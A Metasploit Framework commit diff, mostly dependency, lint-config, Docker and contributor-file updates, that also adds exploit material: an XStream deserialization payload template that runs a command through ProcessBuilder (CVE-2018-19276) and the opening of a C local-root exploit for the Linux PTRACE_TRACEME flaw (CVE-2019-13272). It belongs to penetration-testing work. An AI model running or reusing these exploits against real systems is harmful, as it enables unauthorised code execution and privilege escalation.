automatic module_metadata_base.json update

It's better here, now that it's supported.

Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>

.mailmap

@@ -1,39 +1,41 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>         <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
+cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
+dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
+space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>               <todb@metasploit.com>
+todb-r7 <todb-r7@github>               <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at

.rubocop.yml

@@ -112,21 +112,21 @@ Metrics/MethodLength:
                   often exceed 200 lines.
   Max: 300
 
-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:            
   Enabled: true
   Description: 'Whoever made this requirement never looked at crypto methods, IV'
   MinNameLength: 2
 
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/UnneededPercentQ:
+Style/RedundantPercentQ:
   Enabled: false
 
 Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/AlignHash:
+Layout/HashAlignment:
   Enabled: false
   Description: 'aligning info hashes to match these rules is almost impossible to get right'
 
@@ -142,7 +142,7 @@ Layout/EmptyLinesAroundMethodBody:
   Enabled: false
   Description: 'these are used to increase readability'
 
-Layout/AlignParameters:
+Layout/ParameterAlignment:
   Enabled: true
   EnforcedStyle: 'with_fixed_indentation'
   Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

.travis.yml

@@ -43,7 +43,7 @@ before_install:
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
   # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
   - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml

CONTRIBUTING.md

@@ -4,7 +4,7 @@ Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!  Before you get started, review our
 [Code of Conduct].  There are multiple ways to help beyond just writing code:
  - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
  - [Report a security vulnerability in Metasploit itself] to Rapid7.
  - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
    integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
@@ -36,6 +36,7 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
+* **Don't** post questions in older closed PRs.
 
 Pull request [PR#9966] is a good example to follow.
 
@@ -69,6 +70,7 @@ When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
+* **Don't** attempt to report issues on a closed PR.
 
 If you need some more guidance, talk to the main body of open source contributors over on our
 [Metasploit Slack] or [#metasploit on Freenode IRC].

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.6.5-alpine3.9 AS builder
+FROM ruby:2.6.5-alpine3.10 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -27,8 +27,8 @@ RUN apk add --no-cache \
       zlib-dev \
       ncurses-dev \
       git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
     && bundle install --clean --no-cache --system $BUNDLER_ARGS \
     # temp fix for https://github.com/bundler/bundler/issues/6680
     && rm -rf /usr/local/bundle/cache \
@@ -36,7 +36,7 @@ RUN apk add --no-cache \
     && chmod -R a+r /usr/local/bundle
 
 
-FROM ruby:2.6.2-alpine3.9
+FROM ruby:2.6.5-alpine3.10
 LABEL maintainer="Rapid7"
 
 ENV APP_HOME=/usr/src/metasploit-framework

Gemfile.lock

@@ -1,14 +1,13 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.52)
+    metasploit-framework (5.0.65)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       aws-sdk-ec2
       aws-sdk-iam
       aws-sdk-s3
-      backports
       bcrypt (= 3.1.12)
       bcrypt_pbkdf
       bit-struct
@@ -16,7 +15,10 @@ PATH
       dnsruby
       ed25519
       em-http-request
+      eventmachine
       faker
+      faraday (<= 0.17.0)
+      faye-websocket
       filesize
       jsobfu
       json
@@ -24,7 +26,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.77)
+      metasploit-payloads (= 1.3.83)
       metasploit_data_models (= 3.0.10)
       metasploit_payloads-mettle (= 0.5.16)
       mqtt
@@ -115,37 +117,36 @@ GEM
     arel-helpers (2.10.0)
       activerecord (>= 3.1.0, < 7)
     aws-eventstream (1.0.3)
-    aws-partitions (1.220.0)
-    aws-sdk-core (3.68.1)
+    aws-partitions (1.253.0)
+    aws-sdk-core (3.85.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
-      aws-partitions (~> 1.0)
+      aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.110.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-ec2 (1.124.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.30.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-iam (1.32.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.24.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-kms (1.27.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.48.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-s3 (1.59.0)
+      aws-sdk-core (~> 3, >= 3.83.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
     aws-sigv4 (1.1.0)
       aws-eventstream (~> 1.0, >= 1.0.2)
-    backports (3.15.0)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.1)
     bindata (2.4.4)
     bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
-    crass (1.0.4)
+    crass (1.0.5)
     daemons (1.3.1)
     diff-lcs (1.3)
     dnsruby (1.61.3)
@@ -169,8 +170,11 @@ GEM
       railties (>= 4.2.0)
     faker (2.2.1)
       i18n (>= 0.8)
-    faraday (0.16.2)
+    faraday (0.17.0)
       multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
     filesize (0.2.0)
     fivemat (1.3.7)
     hashery (2.1.2)
@@ -180,8 +184,8 @@ GEM
     jmespath (1.4.0)
     jsobfu (0.4.2)
       rkelly-remix
-    json (2.2.0)
-    loofah (2.3.0)
+    json (2.3.0)
+    loofah (2.4.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     metasm (1.0.4)
@@ -189,7 +193,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-credential (3.0.4)
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 3.0.0)
@@ -203,7 +207,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.77)
+    metasploit-payloads (1.3.83)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -217,7 +221,7 @@ GEM
     metasploit_payloads-mettle (0.5.16)
     method_source (0.9.2)
     mini_portile2 (2.4.0)
-    minitest (5.12.2)
+    minitest (5.13.0)
     mqtt (0.5.0)
     msgpack (1.3.1)
     multipart-post (2.1.1)
@@ -225,7 +229,7 @@ GEM
     net-ssh (5.2.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.4)
+    nokogiri (1.10.7)
       mini_portile2 (~> 2.4.0)
     octokit (4.14.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -235,7 +239,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.13.0)
-    pdf-reader (2.2.1)
+    pdf-reader (2.4.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -262,16 +266,16 @@ GEM
       activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.2.0)
-      loofah (~> 2.2, >= 2.2.2)
+    rails-html-sanitizer (1.3.0)
+      loofah (~> 2.3)
     railties (4.2.11.1)
       actionpack (= 4.2.11.1)
       activesupport (= 4.2.11.1)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (13.0.0)
+    rake (13.0.1)
     rb-readline (0.5.5)
-    recog (2.3.3)
+    recog (2.3.6)
       nokogiri
     redcarpet (3.5.0)
     rex-arch (0.1.13)
@@ -300,7 +304,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.83)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
@@ -310,7 +314,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.20)
+    rex-socket (0.1.21)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
@@ -321,29 +325,29 @@ GEM
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.2)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.5)
+    rspec (3.9.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+    rspec-core (3.9.0)
+      rspec-support (~> 3.9.0)
+    rspec-expectations (3.9.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.2)
+      rspec-support (~> 3.9.0)
+    rspec-mocks (3.9.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.2)
+      rspec-support (~> 3.9.0)
+    rspec-rails (3.9.0)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+      rspec-support (~> 3.9.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.8.3)
+    rspec-support (3.9.0)
     ruby-macho (2.2.0)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
@@ -382,6 +386,9 @@ GEM
       tzinfo (>= 1.0.0)
     warden (1.2.7)
       rack (>= 1.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
     windows_error (0.1.2)
     xdr (2.0.0)
       activemodel (>= 4.2.7)

LICENSE_GEMS

@@ -10,24 +10,23 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.10.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.220.0, "Apache 2.0"
-aws-sdk-core, 3.68.1, "Apache 2.0"
-aws-sdk-ec2, 1.110.0, "Apache 2.0"
-aws-sdk-iam, 1.30.0, "Apache 2.0"
-aws-sdk-kms, 1.24.0, "Apache 2.0"
-aws-sdk-s3, 1.48.0, "Apache 2.0"
+aws-partitions, 1.253.0, "Apache 2.0"
+aws-sdk-core, 3.85.1, "Apache 2.0"
+aws-sdk-ec2, 1.124.0, "Apache 2.0"
+aws-sdk-iam, 1.32.0, "Apache 2.0"
+aws-sdk-kms, 1.27.0, "Apache 2.0"
+aws-sdk-s3, 1.59.0, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.4, MIT
+crass, 1.0.5, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
@@ -40,7 +39,8 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
-faraday, 0.16.2, MIT
+faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
@@ -48,19 +48,19 @@ http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.3.0, MIT
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.52, "New BSD"
+metasploit-credential, 3.0.4, "New BSD"
+metasploit-framework, 5.0.65, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.77, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.12.2, MIT
+minitest, 5.13.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
@@ -68,14 +68,14 @@ nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.4, MIT
+nokogiri, 1.10.7, MIT
 octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.1, MIT
+pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
@@ -86,11 +86,11 @@ rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.2.0, MIT
+rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
-rake, 13.0.0, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.3, unknown
+recog, 2.3.6, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -101,23 +101,23 @@ rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.83, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.20, "New BSD"
+rex-socket, 0.1.21, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.8.0, MIT
-rspec-core, 3.8.2, MIT
-rspec-expectations, 3.8.5, MIT
-rspec-mocks, 3.8.2, MIT
-rspec-rails, 3.8.2, MIT
+rspec, 3.9.0, MIT
+rspec-core, 3.9.0, MIT
+rspec-expectations, 3.9.0, MIT
+rspec-mocks, 3.9.0, MIT
+rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.3, MIT
+rspec-support, 3.9.0, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
@@ -139,6 +139,8 @@ ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.5, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby

README.md

@@ -1,7 +1,7 @@
 Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-COPYING for more details.
+[COPYING](COPYING) for more details.
 
 The latest version of this software is available from: https://metasploit.com
 

data/exploits/CVE-2018-19276/payload.erb

@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>

data/exploits/CVE-2019-13272/Makefile

@@ -0,0 +1,4 @@
+
+all:
+	x86_64-linux-musl-cc -static -s -pie poc.c -o exploit
+

data/exploits/CVE-2019-13272/poc.c

@@ -0,0 +1,464 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// Uses pkexec technique
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid executable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 17.3 kernel 4.4.0-89-generic
+// - Linux Mint 18.3 kernel 4.13.0-16-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// ---
+// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching for known helpers ...
+// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
+// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// To run a command as administrator (user "root"), use "sudo <command>".
+// See "man sudo_root" for details.
+//
+// root@linux-mint-19-2:/home/user#
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+/*
+ * execveat() syscall
+ * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
+ */
+#ifndef __NR_execveat
+#  define __NR_execveat 322
+#endif
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
